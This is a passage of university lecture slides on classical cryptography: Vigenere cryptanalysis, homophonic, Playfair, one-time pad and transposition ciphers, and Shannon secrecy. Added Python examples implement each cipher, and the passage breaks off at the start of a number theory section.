2. Split ciphertext into m groups so that characters in the
same group would have been enciphered using the same
character of the key.
3. Calculate the index of coincidence of each group.
4. Calculate the average index of coincidence of all groups.
5. If the average index of coincidence is “close” to the
English value of ≈ 0.065, then assume m is the correct
length.
6. If not, increase m by 1 and start the process over.
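An added example, not code from the lecture slides, that carries out the Kasiski test, the index of coincidence and the six-step algorithm above, and then the per-group shift recovery that the later “attack on shift cipher with IC” slides describe: each group is matched against English letter frequencies by the shift that maximises the mutual index of coincidence. The English frequency table is the usual textbook one (an assumption of this example, not figures from the slides), the 0.053 cut-off for “close to 0.065” is this example's choice, and both sample texts (a letter profile with exactly English letter counts, and a pangram with a repeated “THE”) are constructed here.

```python
# Added example, not code from the CIS 4520 slides: Kasiski test and index of
# coincidence (IC) to find a Vigenere key length, then per-group shift
# recovery by comparing each group's letter counts with English frequencies.
# ENGLISH_FREQ holds the usual textbook percentages (assumed, not from slides).
from collections import Counter
from typing import Dict, List

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
ENGLISH_FREQ = {
    "A": 8.2, "B": 1.5, "C": 2.8, "D": 4.3, "E": 12.7, "F": 2.2, "G": 2.0,
    "H": 6.1, "I": 7.0, "J": 0.15, "K": 0.77, "L": 4.0, "M": 2.4, "N": 6.7,
    "O": 7.5, "P": 1.9, "Q": 0.095, "R": 6.0, "S": 6.3, "T": 9.1, "U": 2.8,
    "V": 0.98, "W": 2.4, "X": 0.15, "Y": 2.0, "Z": 0.074,
}


def vigenere_encrypt(plaintext: str, key: str) -> str:
    """Shift letter i by key[i mod m]; used here only to build sample ciphertext."""
    p = [c for c in plaintext.upper() if c in ALPHABET]
    return "".join(ALPHABET[(ALPHABET.index(c) + ALPHABET.index(key[i % len(key)])) % 26]
                   for i, c in enumerate(p))


def index_of_coincidence(text: str) -> float:
    """I_c = sum_i n_i (n_i - 1) / (N (N - 1)), as defined on the slides."""
    n = len(text)
    if n < 2:
        return 0.0
    return sum(c * (c - 1) for c in Counter(text).values()) / (n * (n - 1))


def split_into_groups(text: str, m: int) -> List[str]:
    """Group j = letters at positions j, j+m, ...: all enciphered with key letter j."""
    return [text[j::m] for j in range(m)]


def average_ic(text: str, m: int) -> float:
    return sum(index_of_coincidence(g) for g in split_into_groups(text, m)) / m


def find_key_length(ciphertext: str, max_len: int = 20, threshold: float = 0.053) -> int:
    """Slides' algorithm: the smallest m whose average group IC looks English.
    The cut-off 0.053 sits between random text (0.038) and English (0.065);
    if no m reaches it, fall back to the m with the highest average IC."""
    scores = {m: average_ic(ciphertext, m) for m in range(1, max_len + 1)}
    for m in range(1, max_len + 1):
        if scores[m] >= threshold:
            return m
    return max(scores, key=scores.get)


def kasiski_distances(ciphertext: str, seg_len: int = 3) -> List[int]:
    """Distance between every pair of occurrences of each repeated segment."""
    positions: Dict[str, List[int]] = {}
    for i in range(len(ciphertext) - seg_len + 1):
        positions.setdefault(ciphertext[i:i + seg_len], []).append(i)
    return [b - a for occ in positions.values() if len(occ) > 1
            for i, a in enumerate(occ) for b in occ[i + 1:]]


def recover_shift(group: str) -> int:
    """Shift s maximising sum_i n_i * p_{i-s}: the group's counts n lined up
    against English frequencies p (the IC attack on a single shift cipher)."""
    counts = Counter(group)
    best, best_score = 0, -1.0
    for s in range(26):
        score = sum(counts[ALPHABET[i]] * ENGLISH_FREQ[ALPHABET[(i - s) % 26]]
                    for i in range(26))
        if score > best_score:
            best, best_score = s, score
    return best


def recover_key(ciphertext: str, m: int) -> str:
    return "".join(ALPHABET[recover_shift(g)] for g in split_into_groups(ciphertext, m))


def synthetic_english_profile(copies: int = 3) -> str:
    """Constructed sample whose letter counts follow ENGLISH_FREQ exactly. It is
    not prose, but IC and the shift attack only look at letter counts."""
    return "".join(ch * round(f * 10) for ch, f in ENGLISH_FREQ.items()) * copies


if __name__ == "__main__":
    ct = vigenere_encrypt(synthetic_english_profile(), "GUELPH")
    for m in range(1, 8):
        print(f"m={m}: average IC = {average_ic(ct, m):.4f}")
    m = find_key_length(ct)
    print("key length:", m, "-> key:", recover_key(ct, m))
    # Kasiski on a constructed text: 'THE' recurs 25 positions apart, a multiple
    # of the key length 5, so the same ciphertext trigram recurs at distance 25.
    pangram = "THEQUICKBROWNFOXJUMPSOVERTHELAZYDOG"
    print(sorted(kasiski_distances(vigenere_encrypt(pangram, "FTHLV"))))
```

On the synthetic profile the average IC stays near 0.045 for the wrong key lengths and rises to about 0.063 at m = 6, after which each of the six groups is a plain shift cipher and its key letter falls out of recover_shift. Kasiski distances may include accidental repeats, so in practice the candidate key lengths are the divisors shared by most distances rather than a single gcd.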

99

Finding the Key Length: Example

100

Finding the Key Length: Example

101

Attack on Vigenere Cipher
• Recall the note: A Vigenere cipher-encrypted
message consists of a collection of shift ciphers,
each corresponding to a letter in the key.
• Assume we have found that t is the key length - a
collection of t shift ciphers

102

Attack on Shift Cipher with IC

103

Attack on Substitution Cipher with IC

104

Attack on Vigenere Cipher with IC

105

Kasiski Test vs. Index of Coincidence
• Kasiski Test:
– Focus: Identifying repeating letter sequences in
ciphertext.
– Purpose: Estimates the length of the encryption key.
– Approach: Analyzes distances between repeating
sequences for key length.
– Ideal Use: More effective with longer ciphertexts.
– Limitation: Less effective with short texts.
• Index of Coincidence (IoC)
– Focus: Statistical analysis of letter frequencies.
– Purpose: Identifies segments encrypted with the same
key letter.
– Approach: Compares letter frequency in ciphertext to
standard English.
– Ideal Use: Useful regardless of text length.
– Limitation: Requires understanding of statistical norms.
106

Cryptanalysis: Summary
• Problem with monoalphabetic cipher?
– One mapping scheme for the entire encryption process
– Cryptanalysts could observe the patterns
• Countermeasure
– Use a different mapping for each character in the plaintext - Vigenere cipher
• Breaking a Vigenere cipher
– Difficult
– First: find the key length
– Could use a brute force attack to try all possible key lengths
– For each key length, observe the distribution patterns (i.e., calculate the Index of Coincidence).

107

Cryptanalysis: Summary

108

Classical Cryptography
[Figure: hierarchy of classical substitution ciphers]
– Substitution ciphers: to substitute one thing for another
  – Monoalphabetic ciphers: to substitute one letter for another
    – Shift cipher: to shift the alphabet
      – Caesar cipher: to shift the alphabet by 3
• Breaking the monoalphabetic cipher … is easy!
– Cryptanalysts use properties of plaintext
– What can be cryptographers’ counter-moves?

109

Classical Cryptography
[Figure: hierarchy of classical substitution ciphers]
– Substitution ciphers: to substitute one thing for another
  – Monoalphabetic ciphers: to substitute one letter for another
    – Shift cipher: to shift the alphabet
      – Caesar cipher: to shift the alphabet by 3
  – Polyalphabetic ciphers: use multiple alphabets
    – Vigenere cipher: use a different shift (of the alphabet) for each input letter
  – Homophonic ciphers: multiple possible output characters for an input character
  – Polygram ciphers: encipher groups of letters at once
CIS 4520
Introduction to Reading Assignment for Next Class
Cryptography

Wenjing Zhang

• Chapter 3 Section 2 and 3 (3.2 substitution


techniques and 3.3 Transposition Techniques) of
Cryptography and Network Security: Principles
and Practice. 2017. (7th Ed.) William Stallings.
Pearson Education.
CIS 4520
Introduction to Substitution cipher
Cryptography

• Breaking the monoalphabetic cipher … is


Wenjing Zhang

easy!
– Cryptanalysts use properties of plaintext
– What can be cryptographers’ counter-moves?

– Polyalphabetic ciphers
• use multiple alphabets: Vigenere Cipher
– Homophonic ciphers
• multiple possible output characters for an
input character
– Polygram ciphers
• encipher groups of letters at once

112

Homophonic Ciphers
• Try to hide plaintext patterns (statistics)
• Map each plaintext character to any of a set of ciphertext characters
• Homophones: the set of possible ciphertext characters that map to a single plaintext character.

113

Homophonic Ciphers
• Homophonic Ciphers

Plaintext | Homophones
A | 624, 18, 329, 19, 4
B | 5, 333, 511
C | 919, 14, 67, 83
D | 8, 13, 12
E | 414, 30, 238, 71, 15, 6
F | 61, 422
G | 413, 2, 16
• Encrypt: CAFE: 14 624 61 238

114

Homophonic Ciphers
• Q1: How many homophones per plaintext character?
– Choice 1: fixed number
– Choice 2: variable: more for frequent plaintext
characters
– Which is better, why?
• Q2: Are there disadvantages to this?
– Inefficient: ciphertext longer than the plaintext

115

Homophonic Ciphers
• Homophonic Ciphers
[Figure: fixed-homophones cipher table vs. variable-homophones cipher table]
• Encrypt: EXERCISES IN CRYPTOGRAPHY ARE ESSENTIAL FOR UNDERSTANDING
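The homophone table from the slide above (letters A to G only, so other letters are dropped), as an added example that is not code from the lecture slides: encryption draws one homophone per plaintext letter at random and decryption inverts the table, which only works because no code number is shared between two letters. The seeded generator, the symbol_counts helper and the sample strings are this example's own additions.

```python
# Added example (not from the CIS 4520 slides): a homophonic substitution
# cipher built from the slides' table for A..G. Encryption picks one homophone
# per plaintext letter at random; decryption inverts the table.
import random
from collections import Counter
from typing import Dict, List

HOMOPHONES: Dict[str, List[int]] = {   # table from the slide
    "A": [624, 18, 329, 19, 4],
    "B": [5, 333, 511],
    "C": [919, 14, 67, 83],
    "D": [8, 13, 12],
    "E": [414, 30, 238, 71, 15, 6],
    "F": [61, 422],
    "G": [413, 2, 16],
}
# inverse map: every code number must belong to exactly one plaintext letter
INVERSE = {code: letter for letter, codes in HOMOPHONES.items() for code in codes}
assert len(INVERSE) == sum(len(v) for v in HOMOPHONES.values()), "homophones overlap"


def homophonic_encrypt(plaintext: str, seed: int) -> str:
    """One homophone per letter. The seed is only for reproducible output; the
    choice must be unpredictable to an observer for the statistics to hide.
    Letters without a table entry (H..Z here) are dropped."""
    rng = random.Random(seed)
    codes = [rng.choice(HOMOPHONES[ch]) for ch in plaintext.upper() if ch in HOMOPHONES]
    return " ".join(str(c) for c in codes)


def homophonic_decrypt(ciphertext: str) -> str:
    return "".join(INVERSE[int(tok)] for tok in ciphertext.split())


def symbol_counts(ciphertext: str) -> Counter:
    """How often each code appears: with more homophones for frequent letters,
    the ciphertext symbol frequencies flatten out (the cipher's purpose)."""
    return Counter(int(tok) for tok in ciphertext.split())


if __name__ == "__main__":
    ct = homophonic_encrypt("CAFE", 2024)
    print(ct, "->", homophonic_decrypt(ct))
    print(homophonic_decrypt("14 624 61 238"))   # the slide's ciphertext for CAFE
    # Constructed sample: E is 6x as common as F, but E also has 6 homophones,
    # so no single code stands out the way E would in a monoalphabetic cipher.
    sample = "E" * 60 + "F" * 10 + "A" * 50
    print(symbol_counts(homophonic_encrypt(sample, 2024)).most_common(5))
```

The second question on the next slide (fixed versus variable number of homophones) shows up directly in symbol_counts: giving E six codes and F two keeps the per-code counts of the sample roughly level, which a fixed allocation would not.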
116

Polygram Ciphers
• Polygram ciphers
– substitute a group of characters for another group of characters
– Goal: make it difficult for frequency analysis
• Playfair cipher (the polygram cipher covered next)
– Invented by Charles Wheatstone
– Named after Lord Playfair
– Used in World War I

118

Playfair Cipher
• Key table: all the letters into a 5 by 5 table
– Treat I and J as one, or eliminate Q
A B C D E
F G H I/J K
L M N O P
Q R S T U
V W X Y Z
• Write the keyword (w/o duplicates) at the beginning
– Key: superbowl
S U P E R
B O W L A
C D F G H
I/J K M N Q
T V X Y Z
119

Playfair Cipher
• Encryption
– Divide plaintext into pairs
– Double characters are separated by a dummy character (x). Why?
– mi ss is si pp i becomes mi sx si sx si px pi
– If plaintext has an odd number of chars, append a dummy char.
• Encrypt plaintext pair-by-pair using the key table.

120

Playfair Cipher
• A pair of plaintext characters could be:
– same row in the key table
– same column
– different row and column
• Same row
– Substitute with letters on the immediate right
– mi → nk
• Same column
– Substitute with letters directly below
– si → bt
• Different column and row
– substitute each plaintext letter with the letter that is in its own row and in the column of the other plaintext letter
– sx → pt

S U P E R
B O W L A
C D F G H
I/J K M N Q
T V X Y Z

123

Playfair Cipher
• Example
– K = superbowl
– P = misxsisxsipxpi
– C = nkptbtptbtwpsm
• Practice:
– K = superbowl
– P = attack today
– C = BZZB DIVB HOZY
• Decryption:
– Same row
• Substitute with letters on the left
– Same column
• Substitute with letters above
– Different column and row
• Same as encryption

S U P E R
B O W L A
C D F G H
I/J K M N Q
T V X Y Z
125
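The Playfair procedure of the slides above (key table from a keyword, pairs split by a dummy x, the row/column/rectangle rules and their inverses), as an added example that is not code from the lecture slides. It reproduces both worked plaintexts under the key “superbowl”; decryption returns the padded text with the dummy x still in place, as the slides' rule implies. A doubled filler in the plaintext (“xx”) is left as the slides leave it. Function names are this example's own.

```python
# Added example (not from the CIS 4520 slides): the Playfair cipher with the
# slides' conventions: keyword written first without duplicates, I and J
# merged, doubled letters split by the dummy 'X', odd length padded with 'X'.
from typing import Dict, List, Tuple

ALPHABET = "ABCDEFGHIKLMNOPQRSTUVWXYZ"  # 25 letters, J folded into I


def build_key_table(keyword: str) -> List[str]:
    """5x5 table as five strings: keyword letters (deduplicated) then the rest."""
    seen, cells = set(), []
    for ch in (keyword + ALPHABET).upper().replace("J", "I"):
        if ch in ALPHABET and ch not in seen:
            seen.add(ch)
            cells.append(ch)
    return ["".join(cells[r * 5:(r + 1) * 5]) for r in range(5)]


def positions(table: List[str]) -> Dict[str, Tuple[int, int]]:
    return {ch: (r, c) for r, row in enumerate(table) for c, ch in enumerate(row)}


def prepare_pairs(plaintext: str, filler: str = "X") -> List[str]:
    """mississippi -> MI SX SI SX SI PX PI; attack today -> AT TA CK TO DA YX."""
    letters = [c for c in plaintext.upper().replace("J", "I") if c in ALPHABET]
    pairs, i = [], 0
    while i < len(letters):
        a = letters[i]
        b = letters[i + 1] if i + 1 < len(letters) else filler
        if a == b:               # doubled letter: insert the filler, advance by one
            pairs.append(a + filler)
            i += 1
        else:
            pairs.append(a + b)
            i += 2
    return pairs


def transform_pair(pair: str, table: List[str], direction: int) -> str:
    """direction=+1 encrypts (right/below), -1 decrypts (left/above)."""
    pos = positions(table)
    (r1, c1), (r2, c2) = pos[pair[0]], pos[pair[1]]
    if r1 == r2:                       # same row: move along the row
        return table[r1][(c1 + direction) % 5] + table[r2][(c2 + direction) % 5]
    if c1 == c2:                       # same column: move down/up the column
        return table[(r1 + direction) % 5][c1] + table[(r2 + direction) % 5][c2]
    return table[r1][c2] + table[r2][c1]  # rectangle: swap columns (self-inverse)


def playfair_encrypt(plaintext: str, keyword: str) -> str:
    table = build_key_table(keyword)
    return "".join(transform_pair(p, table, +1) for p in prepare_pairs(plaintext))


def playfair_decrypt(ciphertext: str, keyword: str) -> str:
    table = build_key_table(keyword)
    text = [c for c in ciphertext.upper() if c in ALPHABET]
    return "".join(transform_pair("".join(text[i:i + 2]), table, -1)
                   for i in range(0, len(text) - 1, 2))


if __name__ == "__main__":
    print(build_key_table("superbowl"))                  # SUPER BOWLA CDFGH IKMNQ TVXYZ
    print(playfair_encrypt("mississippi", "superbowl"))   # NKPTBTPTBTWPSM
    print(playfair_encrypt("attack today", "superbowl"))  # BZZBDIVBHOZY
    print(playfair_decrypt("BZZBDIVBHOZY", "superbowl"))  # ATTACKTODAYX
```

Because the rectangle rule swaps columns, applying it twice gives the original pair back, which is why the slides say decryption of that case is “same as encryption”; only the row and column cases need the direction reversed.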

Vulnerabilities of Substitution Cipher
• Substitution ciphers
– Monoalphabetic cipher
– Polyalphabetic ciphers
– Homophonic ciphers
– Polygram ciphers
– “classical ciphers”
• Still vulnerable to various attacks
– Brute force attack ➔ when key space is small
– How to generate a large key space?

126

One-Time Pad: Motivation
• Vigenere Cipher (and other substitution ciphers) suffers from short keys
– Brute force attack
• What if we can use a very, very long key?
• One-time pad (Vernam Cipher)
– Gilbert Vernam (AT&T engineer): 1917
– Take a stream of random data (keystream)
– Use it as the key to encrypt the plaintext
– Message receiver uses the same keystream to recover the plaintext
– Each key is as long as the message, and used only once and then discarded
127

One-Time Pad
• How to encrypt?
– Binary data: Bit-wise XOR (logic operator)

128

One-Time Pad
• Concept of Correctness: For every key k and every message m, it holds that
• Proof: the XOR operation ensures the correctness of the One-Time Pad.

129
CIS 4520
Introduction to One-Time Pad
Cryptography

• Bit-wise XOR
Wenjing Zhang

– Encryption: plaintext XOR keystream


– Example: plaintext = “Cafe”

c: C a f e
binary: 01000011 01100001 01100110 01100101
key: 33 72 31 79
binary: 00100001 01001000 00011111 01001111
p  k: 01100010 00101001 01111001 00101010

130
CIS 4520
Introduction to One-Time Pad
Cryptography

• Bit-wise XOR
Wenjing Zhang

– Decryption: ciphertext XOR keystream


– Example: plaintext = “Cafe”

c: C a f e
binary: 01000011 01100001 01100110 01100101
key: 33 72 31 79
binary: 00100001 01001000 00011111 01001111
p  k: 01100010 00101001 01111001 00101010
key: 33 72 31 79
binary: 00100001 01001000 00011111 01001111
c  k: 01000011 01100001 01100110 01100101
131
One-Time Pad: Perfect Security

• If the stream is truly random → perfect security (Claude Shannon)!
– Proven to be impossible to crack!

Perfect Secrecy: Formal Definition

• Observing ciphertext c has no effect on an adversary’s knowledge of message m.
• Insight: there is no pattern, statistical or otherwise, that attackers can exploit since the key is random and never reused.

Perfect Secrecy

• Mathematically, the distribution of the ciphertext does not depend on the distribution of the plaintext.
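An added Python example (not from the course) that carries out the “Cafe” XOR encryption and decryption from the previous slides and then checks the perfect-secrecy statement above exhaustively on a tiny message space: with a uniformly random key, every message produces the same uniform ciphertext distribution, so P(E(K, m) = c) = P(E(K, m') = c) for all m, m', c. The key bytes 33 72 31 79 are read as decimal, which matches the binary rows on the slide.

```python
"""One-time pad over bytes (added example, not from the lecture slides).

Reproduces the lecture's "Cafe" example with key bytes 33 72 31 79 (decimal)
and checks Shannon's perfect-secrecy condition by exhaustion on n-bit messages:
for a uniformly random key, every ciphertext is equally likely whatever the
message, so observing c tells the adversary nothing about m.
"""
from collections import Counter


def xor_bytes(data, key):
    """Bit-wise XOR of two equal-length byte strings: the OTP encrypt AND decrypt step."""
    if len(key) != len(data):
        raise ValueError("one-time pad key must be exactly as long as the message")
    return bytes(d ^ k for d, k in zip(data, key))


def otp_encrypt(plaintext, key):
    return xor_bytes(plaintext, key)            # c = p XOR k


def otp_decrypt(ciphertext, key):
    return xor_bytes(ciphertext, key)           # c XOR k = (p XOR k) XOR k = p


def bits(bs):
    """Render bytes as the 8-bit groups used on the slide, e.g. '01000011 01100001'."""
    return " ".join(f"{b:08b}" for b in bs)


def ciphertext_distribution(message, n_bits):
    """For one n_bits-wide message, count how often each ciphertext value occurs
    when the key ranges over all 2**n_bits values (i.e. a uniformly random key)."""
    return Counter(message ^ key for key in range(2 ** n_bits))


def is_perfectly_secret(n_bits):
    """P(E(K,m)=c) = P(E(K,m')=c) for all m, m', c on an n_bits message space:
    every message must yield the same, uniform ciphertext distribution
    (each of the 2**n_bits ciphertexts reached by exactly one key)."""
    uniform = Counter({c: 1 for c in range(2 ** n_bits)})
    return all(ciphertext_distribution(m, n_bits) == uniform
               for m in range(2 ** n_bits))


if __name__ == "__main__":
    p = b"Cafe"
    k = bytes([33, 72, 31, 79])                 # the slide's key bytes, in decimal
    c = otp_encrypt(p, k)
    print("p    :", bits(p))
    print("k    :", bits(k))
    print("p ^ k:", bits(c))                    # 01100010 00101001 01111001 00101010
    print("c ^ k:", bits(otp_decrypt(c, k)), otp_decrypt(c, k))
    print("perfect secrecy on 4-bit messages:", is_perfectly_secret(4))
```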
One-Time Pad

• Poor man’s one-time pad
• “Book ciphers”
– Alice and Bob share a book as key
– novels
– newspapers
– telephone books
– pieces of music
– decks of cards
Classical Cryptography

Substitution ciphers: to substitute one thing for another
– Monoalphabetic ciphers: to substitute one letter for another
  • Shift cipher: to shift the alphabet
    – Caesar cipher: to shift the alphabet by 3
– Polyalphabetic ciphers: use multiple alphabets
  • Vigenere cipher: use a different shift (of the alphabet) for each input letter
– Homophonic ciphers: multiple possible output characters for an input character
– Polygram ciphers: encipher groups of letters at once
Transposition Ciphers

• We have covered substitution ciphers
• Another major topic in classical cryptography is transposition ciphers (also known as permutation ciphers)
• Rearrange the plaintext to get ciphertext

Substitution vs. Transposition Ciphers

• Substitution Ciphers:
– Replace letters with other letters or symbols.
– Change the actual letters used.
– "HELLO" becomes "IFMMP" (Caesar Cipher).
• Transposition Ciphers:
– Rearrange the order of letters.
– Preserve the actual letters.
– "HELLO" becomes "HLELO" (Columnar Transposition Cipher with key = “KEY”).

• Difference in encryption principle
– Substitution ciphers operate on the values of the bits or characters and are susceptible to frequency analysis since they do not change the order of the elements.
– Transposition ciphers operate on the positions of bits or characters and can be more secure against frequency analysis since they preserve the frequencies but disrupt the pattern.
• Both ciphers can be combined for more complex encryption
– Example: product cipher

Transposition Ciphers

• Rearrange the plaintext to get ciphertext
• Q: what is the most important issue in transposition ciphers?
– Answer: the method of rearrangement.
– The cipher's strength relies on the level of unpredictability in this rearrangement.
– If the method is overly simplistic, it could make it easier for adversaries to decrypt the original message.
Columnar Transposition

• Encryption: use a two-dimensional array (matrix)
– Write plaintext row by row
– Read ciphertext column by column
– Key: order of the columns
• Example
– P = “ATTACKTODAY” (padded with X to fill the last row)

3 4 2 1
A T T A
C K T O
D A Y X

• Ciphertext: AOXTTYACDTKA (the column labelled 1 is read first, then 2, 3, 4)

• Decryption: use the same two-dimensional array (matrix)
– Write ciphertext column by column, in key order
– Read plaintext row by row
– Key: order of the columns
• Ciphertext: AOXTTYACDTKA

3 4 2 1
A T T A
C K T O
D A Y X

• Plaintext: ATTACKTODAYX
General Transposition

Most transpositions use a fixed period d
• Let Zd be the integers from 1 to d
• Let f: Zd → Zd be a permutation over Zd
• Key for the cipher is K = (d, f)
• Message:
M = m1, m2, ..., md, md+1, ..., m2d, ...
• Ciphertext:
C = mf(1), mf(2), ..., mf(d), md+f(1), ..., md+f(d), ...

• Example:
– suppose that the period d = 4
– suppose that f is:

i    1 2 3 4
f(i) 2 4 1 3

– m1 m2 m3 m4 → m2 m4 m1 m3
– P = GUEL PH
– C = ULGE HP
– Last block: PH␣␣ → H␣P␣
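Both transposition schemes above, the columnar cipher with key 3 4 2 1 and the period-d permutation cipher with f = (2, 4, 1, 3), as added Python code that is not the course's own; the padding letters (X for columnar, a space for the period cipher) follow the slides, and the function names are mine.

```python
"""Transposition ciphers from the lecture (added example, not the course's code).

1. Columnar transposition: write the plaintext row by row into a matrix whose
   columns are labelled by the key, then read the columns out in label order.
   ATTACKTODAY with key 3 4 2 1 -> AOXTTYACDTKA (padded with X).
2. General transposition with period d and permutation f on Z_d = {1..d}:
   each block m1..md becomes m_f(1)..m_f(d).
   d = 4, f = (2, 4, 1, 3): GUELPH -> 'ULGEH P ' (last block padded with spaces).
"""


def columnar_encrypt(plaintext, key, pad="X"):
    """key is the column labelling, e.g. [3, 4, 2, 1]; the column labelled 1 is read first."""
    n = len(key)
    text = plaintext.replace(" ", "").upper()
    text += pad * (-len(text) % n)                       # fill the last row
    rows = [text[i:i + n] for i in range(0, len(text), n)]
    order = sorted(range(n), key=lambda col: key[col])   # column indices by label
    return "".join(row[col] for col in order for row in rows)


def columnar_decrypt(ciphertext, key):
    """Inverse: write the ciphertext column by column in key order, read row by row."""
    n = len(key)
    if len(ciphertext) % n:
        raise ValueError("ciphertext length must be a multiple of the key length")
    depth = len(ciphertext) // n                          # number of rows
    order = sorted(range(n), key=lambda col: key[col])
    columns = [""] * n
    for i, col in enumerate(order):                      # i-th chunk fills column `col`
        columns[col] = ciphertext[i * depth:(i + 1) * depth]
    return "".join(columns[col][r] for r in range(depth) for col in range(n))


def periodic_encrypt(plaintext, f, pad=" "):
    """f is the permutation as 1-based positions, e.g. (2, 4, 1, 3): output position i
    of every block holds the input letter m_f(i).  The last block is padded."""
    d = len(f)
    text = plaintext + pad * (-len(plaintext) % d)
    out = []
    for start in range(0, len(text), d):
        block = text[start:start + d]
        out.append("".join(block[f[i] - 1] for i in range(d)))
    return "".join(out)


def periodic_decrypt(ciphertext, f):
    """Apply the inverse permutation: input position f(i) receives output letter i."""
    d = len(f)
    if len(ciphertext) % d:
        raise ValueError("ciphertext length must be a multiple of the period")
    out = []
    for start in range(0, len(ciphertext), d):
        block = ciphertext[start:start + d]
        plain = [""] * d
        for i in range(d):
            plain[f[i] - 1] = block[i]
        out.append("".join(plain))
    return "".join(out)


if __name__ == "__main__":
    print(columnar_encrypt("ATTACKTODAY", [3, 4, 2, 1]))         # AOXTTYACDTKA
    print(columnar_decrypt("AOXTTYACDTKA", [3, 4, 2, 1]))        # ATTACKTODAYX
    print(repr(periodic_encrypt("GUELPH", (2, 4, 1, 3))))       # 'ULGEH P '
    print(repr(periodic_decrypt("ULGEH P ", (2, 4, 1, 3))))     # 'GUELPH  '
```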
General Transposition

• Cryptanalysis
– First, how to determine if it is a transposition cipher?
– Break the transposition cipher
– Use common letter pairs (digrams) and triples (trigrams) to figure out d
Combinations of Approaches

• It is not too difficult to break basic substitutions and basic permutations
• Use a combination of the two → product cipher
– Substitution adds confusion
– Transposition adds diffusion

• Confusion and Diffusion
– Claude Shannon (“father of information theory”): Communication Theory of Secrecy Systems, 1949.
– Shannon Secrecy (perfect secrecy)
P(M = m | E(K, m) = c) = P(M = m)
• Probability of guessing the plaintext knowing the ciphertext = probability of guessing the plaintext without knowing the ciphertext.
P(E(K, m) = c) = P(E(K, m’) = c)
• Probability of any message giving a ciphertext is the same

• Confusion and Diffusion
– Confusion: make the relationship between the plaintext and the ciphertext (or the ciphertext and the key) as complex as possible.
• Use the key in a very complex way.
– Diffusion: dissipate the statistical structure of the plaintext in the long-range statistics of the ciphertext.
• Have many plaintext characters (bits) affect each ciphertext character (bit)

• Confusion and Diffusion
– Claude Shannon introduced the idea of substitution-permutation (S-P) networks (1949)
– The basis of modern block ciphers
– S-P networks are based on the two primitive cryptographic operations:
• substitution (S-box)
• permutation (P-box)
• we will see them in DES (1974)
– Provide confusion and diffusion of the message
Stream and Block Ciphers

• Stream ciphers
– encrypt one symbol (bit, letter) at a time
– encrypt the ith symbol with the ith part of the keystream
• Block ciphers
– Encrypt blocks of plaintext, one block at a time. When a block is not full, it must be padded.
– Encrypt every block with the same key
– Example: the transposition cipher
• Encrypt 4 letters at once
• Cannot just encrypt letter 1 – need to wait for the other letters in the block.

• Stream ciphers
– Vernam (one-time pad)
– Vigenere with period p
• Block ciphers
– Transposition ciphers with period p
– Playfair
– DES (Data Encryption Standard)
– AES (Advanced Encryption Standard)

• Stream ciphers
– Advantages: fast; low error propagation
– Disadvantages: low diffusion; vulnerable to insertions and modifications
• Block ciphers
– Advantages: high diffusion; more immunity to insertion
– Disadvantages: slower; error propagation
• Cipher choice depends on the specific requirements of the system we're securing and the nature of the data we're protecting.
Summary

• So far, we have learned
– Terminology
– Cryptography and Cryptanalysis
– Secret/Symmetric Key Cryptography
• Substitution ciphers
– Caesar, Shift, Vigenere, Homophonic, Playfair
– One-time pad
• Transposition ciphers
• Combinations
• Shannon’s theory of secrecy systems (perfect secrecy)

Reading Assignment for Next Class

• Sections 4.1 - 4.5 of Cryptography and Network Security: Principles and Practice. 2017. (7th Ed.) William Stallings. Pearson Education.

Slides References

• Purdue University CS 555
• North Carolina School of Science and Mathematics Cryptography
Introduction to
Cryptography

Wenjing Zhang CIS 4520 Introduction to Cryptography

Introduction to
Number Theory

Wenjing Zhang
[email protected]
CIS 4520
Introduction to
Cryptography
Outline

• Number theory is about integers and their


Wenjing Zhang

properties
– fundamental to cryptography because many
encryption/decryption algorithms are based on
the properties of numbers
• We will start with the basic principles of
– divisibility
– greatest common divisor
– modular arithmetic
• We will then look at some relevant
algorithms
CIS 4520
Introduction to
Cryptography
Outline

• Number theory is about integers and their


Wenjing Zhang

properties
• We will start with the basic principles of
– divisibility
– greatest common divisor
– modular arithmetic
• We will then look at some relevant
algorithms
Divisibility

• Concepts
– If a and b are integers with a ≠ 0, we say that a divides b if there is an integer c so that b = ac.
– When a divides b we say that a is a factor of b and that b is a multiple of a.
– The notation a | b means that a divides b; a ∤ b means a does not divide b
– Example: 2 | 24 (because 24 = 2*12); 13 | 182 (because 182 = 13*14); 17 | 289; -3 | 33; 17 | 0

• Properties
– If a | b and b | c, then a | c
• Example: 4 | 8 and 8 | 24, so 4 | 24
– If a | b and a | c, then a | (b + c)
• Example: 3 | 6 and 3 | 9, so 3 | 15
– If a | b, then a | bc for all integers c
• Example: 5 | 10, so 5 | 20, 5 | 30, 5 | 40, …
– If b | g and b | h, then b | (mg + nh) for arbitrary integers m and n
• Example: b = 7; g = 14; h = 63; m = 3; n = 2
• Proof: To show 7 | (3*14 + 2*63), we have (3*14 + 2*63) = 7*(3*2 + 2*9), and it is obvious that 7 | (7*(3*2 + 2*9)).
Prime Numbers

• A positive integer p greater than 1 is called prime if the only positive factors of p are 1 and p.
– Example: 2 (because 2 = 1*2), 3 (because 3 = 1*3), 5 (because 5 = 1*5), 7 (because 7 = 1*7), …
• A positive integer that is greater than 1 and is not prime is called composite.
– Example: 4 (because 4 = 2*2), 6 (because 6 = 2*3), 8 (because 8 = 2*4), …
• TopHat Quiz

• The Fundamental Theorem of Arithmetic:
– Every integer greater than 1 that is not a prime can be written uniquely as a product of primes that are written in non-decreasing order.
– Example: the number 12 can be factored into 2*2*3
– This unique factorization is like a fingerprint for numbers.
• Relevance to Cryptography:
– Many encryption algorithms rely on the difficulty of factoring large numbers into the product of primes as a security measure.

Prime Factorization

• Breaking down a number into its prime number components.
• In cryptography, we often work with prime factors to encrypt and decrypt messages securely.
• Examples:
15 = 3·5
48 = 2·2·2·2·3 = 2^4·3
17 = 17
100 = 2·2·5·5 = 2^2·5^2
512 = 2·2·2·2·2·2·2·2·2 = 2^9
515 = 5·103
• TopHat Quiz
The Division Algorithm

• Important mathematical tool in cryptography for dividing integers; it helps in understanding modular arithmetic in encryption algorithms.
• Division Algorithm: Let a be an integer and d a positive integer. Then there are unique integers q and r, with 0 ≤ r < d, such that a = d*q + r.
– d is called the divisor,
– a is called the dividend,
– q is called the quotient, and
– r is called the remainder.

• Example: When we divide 17 by 5, we have 17 = 5*3 + 2.
– 17 is the dividend,
– 5 is the divisor,
– 3 is called the quotient, and
– 2 is called the remainder.

• Another example: What happens when we divide -11 by 3?
• Note that the remainder cannot be negative.
-11 = 3(-4) + 1
– -11 is the dividend,
